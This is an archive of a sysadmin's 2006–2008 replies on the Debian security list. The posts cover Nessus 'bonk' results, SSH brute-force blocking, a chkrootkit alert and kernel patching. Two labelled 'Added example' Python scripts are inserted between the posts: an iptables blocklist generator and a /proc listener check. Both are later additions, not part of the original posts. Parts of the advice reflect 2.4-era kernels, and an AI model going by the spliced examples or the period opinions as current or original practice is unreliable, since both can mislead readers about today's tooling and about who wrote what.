--On March 3, 2006 10:01:54 AM -0800 Zakai Kinan <[EMAIL PROTECTED]> wrote:

> I just installed a server with sarge 3.1 and after
> testing it with nessus it is vulnerable to bonk.  I am
> trying to figure out how that is possible and how to
> fix it?  My other servers are not vulnerable to bonk.
> I run a debian shop.
>
> Thanks for any insight,

I've no idea WTF 'bonk' is, having never heard of it before, but I'll bet
it's a badly written nessus plugin or just a plugin that's false
positive-ing.







Re: Bonk vulnerability!

2006-03-03 Thread Michael Loftis



--On March 3, 2006 1:55:14 PM -0800 Zakai Kinan <[EMAIL PROTECTED]> wrote:

> Oh, that is cute.  Bonk is similar to teardrop.  I was
> able to use nessus plugin to crash the sarge 3.1
> server.

Did it actually crash or did nessus just report one?  If it crashed what
was the Oops onscreen?  This is dubious at best since I'm not aware of any
variant of Linux that is susceptible to this attack, and no box I've got
here is (3.0, 3.1, RH, SuSE).

If your machine is crashing it's probably completely unrelated to 'bonk'
and is either a driver issue or hardware issue.






Re: howto block ssh brute-force

2006-03-12 Thread Michael Loftis
The only thing I can say is be *VERY* careful on a busy Linux box.
iptables sucks.  It's sequential, meaning every entry in a list has to be
processed.  Your best bet is to first match TCP SYN packets and jump to
another separate chain ONLY for the SYN packets, then do your denies there,
and do stateful accept.  State gets processed before the rest of the FW
code, and statefully established sessions are in hash structures/radix
lookup rather than a linked list.  If the box does any sort of traffic or
gets even a half-decent number of attacks you'll pretty quickly find out
that if you get a few hundred rule lines up the amount of CPU time spent
per packet w/o these little tweaks is very high.

--On March 12, 2006 4:50:51 AM -0300 Felipe Figueiredo <[EMAIL PROTECTED]> wrote:

> Hello,
>
> once in a while (say, every two weeks) I get a brute-force
> login/password scan attempt in my server (i.e., a single ip tries
> dictionary account names and passwords at random). SSH access is
> needed by many users, and (RSA/DSA key)-only access is, at present
> time, unwanted. So far none such attempt was lucky (to my knowledge),
> but it always gives me creeps when I see unusually big logwatch
> reports, and my contacts to sysadmins of originating networks are
> usually ignored.
>
> Any ideas?
>
> Maybe there is a way to temporarily block ips upon such attempts (is
> this a FAQ?), or maybe divert them like what portsentry does for
> portscans?










Re: howto block ssh brute-force

2006-03-12 Thread Michael Loftis



--On March 12, 2006 2:29:09 PM +0100 martin f krafft <[EMAIL PROTECTED]> 
wrote:



also sprach Michael Loftis <[EMAIL PROTECTED]> [2006.03.12.1159 +0100]:

The only thing I can say is be *VERY* careful on a busy Linux box.
iptables sucks. It's sequential, meaning every entry in a list has to be
processed.


This is not the case. You can branch iptables rulesets to arbitrary
complexity. In fact, I often wanted Firewall-1 to have a similar
feature. Firewall-1 scales pretty damn well (4 Gbps throughput,
stateful), but in my experience, iptables can handle way more.


Yes you can make arbitrarily deep jumps/chains, but any single list is 
still processed sequentially.  One could probably implement scripting to 
produce a sort of binary tree on hashes/jumps to chains.  Fact is it does 
not do long lists well at all because they are processed sequentially, 
unless this has changed for 2.6.


I'd love to see a Linux box capable of 4Gbps throughput but somehow I 
really doubt this as being possible without a LOT more work, and some 
pretty trick hardware.


Linux iptables definitely has more flexibility than anything else out there 
right now, I'll certainly give it that hands down.  Long lists though 
(at least in 2.4) and it falls flat.  We once tried doing blocking on the 
mail servers for dictionary attempts and some other nasties on SMTP, but 
that didn't last long mostly because even just jumping to process SYN 
packets on the list it still ate up a lot of the system's horsepower. 
These lists were pretty long (1500-2000 hosts) but still.





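Added example (not Michael's script, which he only describes): the ruleset structure from his two messages, generated in Python as iptables-restore input. ESTABLISHED,RELATED is accepted before anything else, only connection-opening SYNs are sent to a separate chain, and a long host blocklist is split into per-prefix chains so a SYN walks one jump table plus one bucket instead of the whole list. The chain names SYN_IN and BL_*, the open ports and the 2000-host blocklist are made up for the example.

```python
"""Generate an iptables-restore ruleset: stateful accept first, a SYN-only chain,
and a host blocklist split into per-prefix chains. Added example; chain names
SYN_IN / BL_* and the blocklist are assumptions, not from the original messages."""
import ipaddress
from collections import defaultdict

# Constructed blocklist of 2000 attacker hosts spread over 200 /8s (no duplicates:
# the (first, second) octet pair is unique for i < lcm(200, 256) = 6400).
BLOCKED = [f"{11 + i % 200}.{(i * 7) % 256}.{(i * 13) % 256}.{i % 251 + 1}"
           for i in range(2000)]


def bucket_blocklist(blocked, prefixlen=8):
    """Group blocked hosts by their enclosing network of the given prefix length."""
    buckets = defaultdict(list)
    for host in blocked:
        addr = ipaddress.IPv4Address(host)
        net = ipaddress.IPv4Network((addr, prefixlen), strict=False)
        buckets[net].append(addr)
    return dict(buckets)


def chain_name(net):
    """BL_11_0_0_0_8 for 11.0.0.0/8 (iptables chain names are limited to 28 chars)."""
    return "BL_" + str(net.network_address).replace(".", "_") + f"_{net.prefixlen}"


def build_ruleset(blocked, open_tcp_ports=(22, 25, 80), prefixlen=8):
    buckets = bucket_blocklist(blocked, prefixlen)
    nets = sorted(buckets)
    lines = ["*filter",
             ":INPUT DROP [0:0]", ":FORWARD DROP [0:0]", ":OUTPUT ACCEPT [0:0]",
             ":SYN_IN - [0:0]"] + [f":{chain_name(n)} - [0:0]" for n in nets]
    # 1. State first: packets of established flows match here and never walk the rest.
    lines += ["-A INPUT -i lo -j ACCEPT",
              "-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT",
              "-A INPUT -m state --state INVALID -j DROP",
              # 2. Only connection-opening SYNs pay for the blocklist and service rules.
              "-A INPUT -p tcp --syn -j SYN_IN"]
    # 3. One jump per occupied prefix: a SYN enters at most one bucket chain,
    #    and the bucket jumps come before the service accepts.
    lines += [f"-A SYN_IN -s {n} -j {chain_name(n)}" for n in nets]
    lines += [f"-A SYN_IN -p tcp --dport {p} -j ACCEPT" for p in open_tcp_ports]
    for n in nets:
        lines += [f"-A {chain_name(n)} -s {a} -j DROP" for a in sorted(buckets[n])]
        lines.append(f"-A {chain_name(n)} -j RETURN")   # not listed: back to SYN_IN
    lines.append("COMMIT")
    return "\n".join(lines) + "\n"


def worst_case_syn_rules(blocked, prefixlen=8):
    """Rule evaluations a non-blocked SYN can hit in SYN_IN before reaching the
    service accepts: one jump per bucket, the largest bucket, plus its RETURN.
    A flat list costs len(blocked) evaluations."""
    buckets = bucket_blocklist(blocked, prefixlen)
    return len(buckets) + max((len(v) for v in buckets.values()), default=0) + 1


if __name__ == "__main__":
    print(build_ruleset(BLOCKED[:5]))
    print(f"flat: {len(BLOCKED)} rules, /8 tree: {worst_case_syn_rules(BLOCKED)} rules")
```

worst_case_syn_rules() puts a number on the point: 2000 flat DROP rules become about 211 evaluations per SYN with /8 buckets on this list. The prefix length is the knob; for a blocklist clustered in a handful of prefixes you would bucket on /16 instead. Today an ipset hash:ip set does the same lookup in one rule, but the chain tree is what a stock 2.4 box could do.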


Re: [SECURITY] [DSA 1020-1] New flex packages fix insecure code generation

2006-03-27 Thread Michael Loftis
Ouch... is anyone anywhere beginning to do an audit of other packages to 
find out what's affected by this?






Re: recent kernel vulnerabilities - debian specific?

2006-03-29 Thread Michael Loftis



--On March 29, 2006 10:19:30 AM +0200 Frank Van Damme 
<[EMAIL PROTECTED]> wrote:



Hello,

I have a question about the recent vulnerabilities in
kernel-source-2.6.8. I would like to know if these bugs were specific
to Debian and, if not, which versions of the (vanilla) kernel are
vulnerable. All references to current mainline kernel security
problems are welcome. Thanks in advance.


This is why they list CVE information, go look at http://cve.mitre.org/ and 
by getting the various CVEs related to the debian security update you'll 
find your answers.  Yes, it is NOT debian specific, the kernel isn't debian 
specific.






Re: IDS for a non-well-known protocol?

2006-04-10 Thread Michael Loftis



--On April 10, 2006 10:39:18 AM +0200 Lezgin Bakircioglu 
<[EMAIL PROTECTED]> wrote:



Greetings to everybody in the security scene.
I have a question around the area IDS.
I am in a difficult situation, i need a IDS that shall support a
non-well-known protocol, is there any tip on any good IDS that is easy to
dev a understanding for this protocol?


I'm not sure what you're asking entirely but if I read your question right 
I don't think you want an IDS at all, you just want a packet sniffer, like 
ethereal/tethereal or even tcpdump so you can develop an understanding of 
what's going over the wire with the protocol you're looking at.  If you aim 
to create signatures/etc to trigger alarms or log entries then IDS *might* 
sort of be what you're looking for.


If it really is IDS (Intrusion Detection System) you're looking for it 
depends on what type/level of IDS.  A popular approach is to use a packet 
sniffing based IDS such as Snort, another approach is to setup honeypots 
using say honeyd/honeynet.


SNORT's site has lots of good guides on how to set it up.


Any good docs/howto or guides?
I have looked a little into snort and my thought is to use that; a
little complicated doc in this area but should be possible..
Any good community tips?









--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting





Re: Debian Kernel security status?

2006-04-19 Thread Michael Loftis



--On April 19, 2006 4:50:27 PM +0200 Jan Luehr 
<[EMAIL PROTECTED]> wrote:



Hello,

looking at the recent vanilla changes, there seems to be a rather rapid
development at the moment ;-) and I've to confess that I lost the
overview of what sec-holes do affect debian and which don't.

I was frightened recently, when I noticed that 2.4.27 was fixing
some CVE-2004 stuff over a month ago as well as 2.6.

Just take a look at CVE-2004-1017. It was fixed in red hat in january
2005 and fixed in debian in march 2006.

Therefore I suspect that the debian kernels do have some security flaws,
fixed in mainline kernel months ago. Am I wrong here?

This takes me to a difficult point:
- I can run 2.4 on my servers, which is considered to be deprecated for
  etch.
- I can use the debian kernels and risk being compromised.
- I can say goodbye to linux and use Debian/kBSD
- I can use my own vanilla builds, building a new kernel every day.
  (Looking at the amount of patches since april 12th.)

Anyway, what do you recommend?
And is there any public status / shape information on the debian kernels?



Increasingly 2.6 is unsuitable for production use due to its huge amount of 
change and lack of stable tree.  There was a decision to do away with the 
old split development/odd numbered development model sometime after about 
2.6.11 so all hope of a stable 2.6 series is gone.






Re: INFECTED (PORTS: 600)

2006-05-18 Thread Michael Loftis



--On May 18, 2006 9:17:09 AM -0400 Morgan Walker <[EMAIL PROTECTED]> wrote:




Hey guys,



Just new to this mailing list, hope you guys can help me out.  I was
testing out the chkrootkit package on one of my debian boxes.  After
running 'chkrootkit -q' I received the following output:


Use lsof and ps to find out who's running that proc and where from.  If 
root isn't running it then someone has a hacked binary that's trying to 
hide, if root is, and lsof indicates it's not /sbin/rpc.statd then you're 
owned.  It's kind of unusual for statd to show up on such a low port but 
not totally unheard of.






INFECTED (PORTS:  600)



I looked further into it and narrowed down to this.  'netstat -naptu |
grep 600' gave me the following output:



udp0  0 0.0.0.0:600 0.0.0.0:*
2120/rpc.statd



I have searched around on other mailing lists and forums, but could never
really get a definitive answer.  Is this a common message for chkrootkit,
should I be worried?  Any help would be great, thanks in advance.



~Morgan



Morgan Walker
Systems Administrator/Engineer
M•CAM, Inc.
Omni Business Center

210 Ridge-McIntire Rd., Suite 300

Charlottesville, VA 22903
434.979.7240 x311



http://www.m-cam.com
=
This message, including any attachments, is intended solely for the use
of the named recipient(s) and may contain confidential and/or
privileged information.  Any unauthorized review, use, disclosure or
distribution of this communication(s) is expressly prohibited.
If you are not the intended recipient, please contact the sender by
reply e-mail and destroy any and all copies of the original message.
Thank you.
=========






--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting
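Added example (not from the original post): the lsof/ps check Michael recommends, done directly against /proc in Python. It maps the UDP port to its socket inode and owning uid from /proc/net/udp, finds the process holding that inode, reads the process's real uid and executable path, and compares them with what is expected. The /proc/net/udp excerpt and status line are constructed; /sbin/rpc.statd and uid 0 are the expectations from the thread, and if the daemon on your system runs under a dedicated user you pass that uid as expected_uid.

```python
"""Verify which process owns a UDP listener and what binary it really runs, straight
from /proc. Added example implementing the lsof/ps check above; sample data constructed."""
import os

# Constructed /proc/net/udp excerpt: port 0x0258 = 600 owned by uid 0, inode 5813,
# and a DNS listener (0x0035 = 53) owned by uid 102 for contrast.
SAMPLE_PROC_NET_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
  12: 00000000:0258 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 5813 2 c1a2b3c4 0
 185: 00000000:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000   102        0 4190 2 c1a2b3c4 0
"""


def parse_proc_net_udp(text, port):
    """Return (uid, inode) of the socket bound to local `port`, or None.
    local_address is hex 'IP:PORT'; the socket's uid and inode are columns 7 and 9."""
    for line in text.splitlines()[1:]:          # skip the header line
        fields = line.split()
        if len(fields) < 10:
            continue
        if int(fields[1].split(":")[1], 16) == port:
            return int(fields[7]), int(fields[9])
    return None


def parse_status_uid(text):
    """Real uid from a /proc/<pid>/status 'Uid:' line (real, effective, saved, fs)."""
    for line in text.splitlines():
        if line.startswith("Uid:"):
            return int(line.split()[1])
    return None


def pid_for_socket_inode(inode, proc="/proc"):
    """Find the pid whose fd table holds socket:[inode] (run as root to see every process)."""
    target = f"socket:[{inode}]"
    for pid in filter(str.isdigit, os.listdir(proc)):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:                # process exited, or not ours to inspect
            continue
        for fd in fds:
            try:
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    return int(pid)
            except OSError:
                continue
    return None


def verdict(exe, uid, expected_exe, expected_uid=0):
    """Decision logic kept apart from /proc access so it can be tested offline."""
    if exe.endswith(" (deleted)"):
        return "binary-deleted"        # running from an unlinked file: a hiding trick
    if uid != expected_uid:
        return "wrong-user"
    if exe != expected_exe:
        return "wrong-binary"
    return "ok"


def check_listener(port, expected_exe, expected_uid=0, proc="/proc"):
    """End-to-end check against the live /proc tree (Linux, as root)."""
    with open(os.path.join(proc, "net", "udp")) as f:
        found = parse_proc_net_udp(f.read(), port)
    if found is None:
        return {"status": "not-listening"}
    sock_uid, inode = found
    pid = pid_for_socket_inode(inode, proc)
    if pid is None:                    # a bound socket nobody visibly owns is itself suspicious
        return {"status": "no-visible-owner", "socket_uid": sock_uid, "inode": inode}
    with open(os.path.join(proc, str(pid), "status")) as f:
        uid = parse_status_uid(f.read())
    exe = os.readlink(os.path.join(proc, str(pid), "exe"))
    return {"status": verdict(exe, uid, expected_exe, expected_uid),
            "pid": pid, "uid": uid, "socket_uid": sock_uid, "exe": exe}


if __name__ == "__main__":
    print(check_listener(600, "/sbin/rpc.statd"))
```

Reading /proc/<pid>/exe rather than trusting the command name in ps or netstat is the point: a renamed binary in /tmp or a process whose file was unlinked after exec shows up here even when the process title says rpc.statd. "no-visible-owner" as a non-root user usually just means you lack permission to look at other users' fd tables; as root it means something is hiding the process.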



Re: security mirror out of date: 128.101.240.212

2007-05-14 Thread Michael Loftis



--On May 15, 2007 12:14:28 AM +0300 Tomas Nykung <[EMAIL PROTECTED]> wrote:



PS
What I don't understand is why I always got the bad mirror, regardless
how many times I tried to rerun aptitude/apt-get update both yesterday
and today (and on two computers while the first one I upgraded did get
the upgrade without any problem).

The only way I could get the upgraded kernel version was to wget it
and install i by hand.

Not that I will lose any sleep because of this ;) but if someone have
time to shed some light on this I would be grateful.
DS


Random luck, or, probably just as or more likely, a bad caching resolver that 
doesn't round-robin its cached replies.


--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting





Re: CISP Compliance

2007-08-21 Thread Michael Loftis

CISP compliance is more about policy and practices than about software.

--On August 20, 2007 6:14:36 PM -0500 Jonathan Wilson <[EMAIL PROTECTED]> wrote:


Sorry if this is the wrong place for this, but:

Does anyone know of a place I can get information on setting up CISP
(VISA  credit card) compliant Debian systems - or Linux in general, if
there's no  Debian-specific info. I've been searching the web for a
couple hours and I  don't know if I'm searching for the wrong phrases or
what, but I'm not  finding anything at all.

What I'm looking for is, essentially, what software needs to be installed
to  make a system storing and processing CC info CISP compliant, and what
settings need to be configured to match.

I'm just sure there's folks out there who've secured Debian systems and
installed & configured the necessary software for logging, auditing,
monitoring, etc. I just can't find anything about it - maybe I'm blind
today.

Thanks,

JW

--

--
System Administrator - Cedar Creek Software
http://www.cedarcreeksoftware.com http://jwadmin.blogspot.com









--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting





Re: Debian suggestion on File Deletion

2007-12-12 Thread Michael Loftis



--On December 12, 2007 12:19:28 PM -0800 David de Hilario Richards 
<[EMAIL PROTECTED]> wrote:





Hello Debian OS developers,


I have a suggestion for the Debian Project:


The system/administration section of the OS is password protected. This
is a good protection against viruses etc that would attack the OS but
maybe the Debian developers could include password protecting Emptying
the Trash. So when you delete files, they would be sent to the Trash as
always but if you want to empty it, a user password would be necessary.
This would prevent harm from viruses even though I understand that Linux
has very few of them.

The same idea could be applied to the Terminal. The Terminal would ask
for a password every time you would want to delete a file.


To my knowledge, today the only way of protecting files in a similar way
is to create different user profiles with different permissions.


To actually do that requires a fundamental change in the way the kernel 
implements access controls.  SELinux can do these sorts of audits and 
preventions on a process by process basis.  So it's already there, you just 
need to deploy it and set it up to suit your needs/environment.





Hope you will take my suggestion into account.


Regards,
David




--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting





Re: Why not have firewall rules by default?

2008-01-23 Thread Michael Loftis



--On January 23, 2008 9:19:01 AM -0600 William Twomey 
<[EMAIL PROTECTED]> wrote:



It's my understanding (and experience) that a Debian system by default is
vulnerable to SYN flooding (at least when running services) and other
such mischief. I was curious as to why tcp_syncookies (and similar
things) are not enabled by default.


There was, at least at some point I believe, evidence that some 
platforms/firewalls didn't play well with SYN cookies.  I could be wrong.



Many distros (RPM-based mostly from my experience) ask you during the
install if you'd like to enable firewall protection. I was curious if
debian was ever going to have this as an option?


There are so many different choices of firewall management packages. 
Shorewall is one I use, there are many others.  Some of which don't play 
well with extra things that some users may use like wondershaper.  Debian 
is still one of those distros that believes a little more in choice than 
just pushing things down the user's throat.




One solution could be to have a folder called /etc/security/iptables that
contains files that get passed to iptables at startup (in the same way
/etc/rc2.d gets read in numeric order). So you could have files like
22ssh, 23ftp, etc. with iptable rules in each file. You could also have
an 'ENABLED' variable like some files in /etc/default have (so that ports
wouldn't be opened by default; the user would have to manually enable
them for the port to be opened).
 Then they'd just run /etc/init.d/iptables restart and the port would be
opened (flush the rules, reapply).


It's better to leave the service disabled, or even better, completely 
uninstalled from a security standpoint, and from a DoS standpoint as well. 
The Linux kernel isn't very efficient at processing firewall rules.  Newer 
kernels might be though (I honestly haven't looked as deeply into this in 
late 2.6 as I did/do in 2.4...2.4 processes firewall rules strictly step by 
step).




Even a central iptables-save format file that gets passed to iptables at
startup would be nice. It's easy enough to do manually, but would be nice
to see integrated with debian itself (packages managing their own rules,
etc.).


This much does exist.   invoke-rc.d iptables save --- I'm not sure what 
package the /etc/init.d/iptables script is in, seems to me like it was part 
of the same package that provided the binaries.



Is debian ever going to introduce a better way of having iptables rules
be run at startup and easily saved/managed, or will this always be a
manual process?


Probably not, as, in the distro, there's at least one good firewall 
management utility, and probably more than one.  No need to reinvent the 
wheel.



